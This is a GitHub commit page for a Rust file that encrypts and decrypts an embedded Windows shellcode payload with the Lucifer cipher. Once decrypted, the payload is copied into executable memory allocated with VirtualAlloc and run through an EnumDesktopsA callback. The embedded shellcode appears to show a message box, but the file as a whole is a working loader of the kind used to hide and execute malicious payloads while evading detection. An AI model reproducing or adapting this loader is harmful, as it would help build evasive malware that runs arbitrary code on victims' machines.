Skip to content

Commit a560676

Browse files
committed
Lucifer Algorithm
Encrypt and Decrypt Shellcodes using Lucifer Algorithm
1 parent fd3e398 commit a560676

File tree

1 file changed

+204
-0
lines changed

1 file changed

+204
-0
lines changed
Lines changed: 204 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,204 @@
1+
/*
2+
Lucifer Algorithm
3+
Encrypt and Decrypt shellcode using Lucifer Algorithm.
4+
Credits: Cocomelonc: https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
5+
6+
@5mukx
7+
*/
8+
9+
use std::mem;
10+
use winapi::{
11+
ctypes::c_void,
12+
um::{
13+
handleapi::CloseHandle, memoryapi::VirtualAlloc, winnt::{RtlMoveMemory, MEM_COMMIT, PAGE_EXECUTE_READWRITE}, winuser::{EnumDesktopsA, GetProcessWindowStation}
14+
},
15+
};
16+
17+
const BLOCK_SIZE: usize = 16;
18+
const KEY_SIZE: usize = 16;
19+
const ROUND_COUNT: usize = 16;
20+
const STEP_COUNT: usize = 8;
21+
22+
23+
static S0: [u8; 16] = [
24+
0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00, 0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08,
25+
];
26+
27+
static S1: [u8; 16] = [
28+
0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04, 0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05,
29+
];
30+
31+
static M1: [u8; 8] = [0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01];
32+
static M2: [u8; 8] = [0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE];
33+
34+
// Helper functions
35+
fn shift_left(x: u8, n: u8) -> u8 {
36+
x << n
37+
}
38+
39+
fn shift_right(x: u8, n: u8) -> u8 {
40+
x >> n
41+
}
42+
43+
fn highsubbyte(x: u8) -> u8 {
44+
x >> 4
45+
}
46+
47+
fn lowsubbyte(x: u8) -> u8 {
48+
x & 0x0F
49+
}
50+
51+
// Lucifer function
52+
fn lucifer(block: &mut [u8; BLOCK_SIZE], key: &[u8; KEY_SIZE], decrypt: bool) {
53+
let (lower_half, upper_half) = block.split_at_mut(BLOCK_SIZE / 2);
54+
55+
let mut key_byte_idx = if decrypt { 8 } else { 0 };
56+
57+
for _round in 0..ROUND_COUNT {
58+
if decrypt {
59+
key_byte_idx = (key_byte_idx + 1) % ROUND_COUNT;
60+
}
61+
62+
for step in 0..STEP_COUNT {
63+
let mut message_byte = upper_half[step];
64+
65+
// Confusion
66+
if key[key_byte_idx] & M1[STEP_COUNT - step - 1] != 0 {
67+
message_byte = shift_left(S1[highsubbyte(message_byte) as usize], 4) | S0[lowsubbyte(message_byte) as usize];
68+
} else {
69+
message_byte = shift_left(S0[highsubbyte(message_byte) as usize], 4) | S1[lowsubbyte(message_byte) as usize];
70+
}
71+
72+
// Key interruption
73+
message_byte ^= key[key_byte_idx];
74+
75+
// Permutation
76+
message_byte = (shift_right(message_byte & M1[0], 3))
77+
| (shift_right(message_byte & M1[1], 4))
78+
| (shift_left(message_byte & M1[2], 2))
79+
| (shift_right(message_byte & M1[3], 1))
80+
| (shift_left(message_byte & M1[4], 2))
81+
| (shift_left(message_byte & M1[5], 4))
82+
| (shift_right(message_byte & M1[6], 1))
83+
| (shift_left(message_byte & M1[7], 1));
84+
85+
// Diffusion
86+
for i in 0..STEP_COUNT {
87+
let idx = (step + i) % STEP_COUNT;
88+
lower_half[idx] = ((message_byte ^ lower_half[idx]) & M1[i]) | (lower_half[idx] & M2[i]);
89+
}
90+
91+
if step < STEP_COUNT - 1 || decrypt {
92+
key_byte_idx = (key_byte_idx + 1) % ROUND_COUNT;
93+
}
94+
}
95+
96+
// Swap halves
97+
for i in 0..BLOCK_SIZE / 2 {
98+
std::mem::swap(&mut lower_half[i], &mut upper_half[i]);
99+
}
100+
}
101+
102+
// Physically swap halves
103+
for i in 0..BLOCK_SIZE / 2 {
104+
block.swap(i, i + BLOCK_SIZE / 2);
105+
}
106+
}
107+
108+
109+
fn lucifer_encrypt_payload(payload: &mut [u8], key: &[u8; KEY_SIZE]) {
110+
for block in payload.chunks_exact_mut(BLOCK_SIZE) {
111+
lucifer(block.try_into().unwrap(), key, false);
112+
}
113+
}
114+
115+
fn lucifer_decrypt_payload(payload: &mut [u8], key: &[u8; KEY_SIZE]) {
116+
for block in payload.chunks_exact_mut(BLOCK_SIZE) {
117+
lucifer(block.try_into().unwrap(), key, true);
118+
}
119+
}
120+
121+
fn main() {
122+
let key_str = "5mukx";
123+
124+
let key: [u8; KEY_SIZE] = {
125+
let mut temp = [0u8; KEY_SIZE];
126+
temp[..key_str.len()].copy_from_slice(key_str.as_bytes());
127+
temp
128+
};
129+
130+
let mut shellcode: Vec<u8> = vec![
131+
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
132+
0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
133+
0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
134+
0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
135+
0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
136+
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
137+
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
138+
0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
139+
0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
140+
0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
141+
0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
142+
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
143+
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
144+
0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
145+
0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
146+
0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
147+
0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
148+
0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
149+
0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
150+
0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
151+
0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
152+
0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
153+
0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
154+
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
155+
0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
156+
0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
157+
0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
158+
0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
159+
];
160+
161+
// Padding
162+
let pad_len = (BLOCK_SIZE - shellcode.len() % BLOCK_SIZE) % BLOCK_SIZE;
163+
shellcode.extend(vec![0x90; pad_len]);
164+
165+
println!("Original payload:");
166+
for byte in &shellcode {
167+
print!("{:02x} ", byte);
168+
}
169+
println!("\n");
170+
171+
lucifer_encrypt_payload(&mut shellcode, &key);
172+
173+
println!("Encrypted payload:");
174+
for byte in &shellcode {
175+
print!("{:02x} ", byte);
176+
}
177+
println!("\n");
178+
179+
lucifer_decrypt_payload(&mut shellcode, &key);
180+
181+
println!("Decrypted payload:");
182+
for byte in &shellcode {
183+
print!("{:02x} ", byte);
184+
}
185+
println!("\n");
186+
187+
unsafe {
188+
let mem = VirtualAlloc(
189+
std::ptr::null_mut(),
190+
shellcode.len(),
191+
MEM_COMMIT,
192+
PAGE_EXECUTE_READWRITE,
193+
);
194+
195+
if !mem.is_null() {
196+
RtlMoveMemory(mem, shellcode.as_ptr() as *mut c_void, shellcode.len());
197+
198+
EnumDesktopsA(GetProcessWindowStation(), mem::transmute(mem), 0);
199+
200+
CloseHandle(mem);
201+
}
202+
}
203+
}
204+

0 commit comments

Comments
 (0)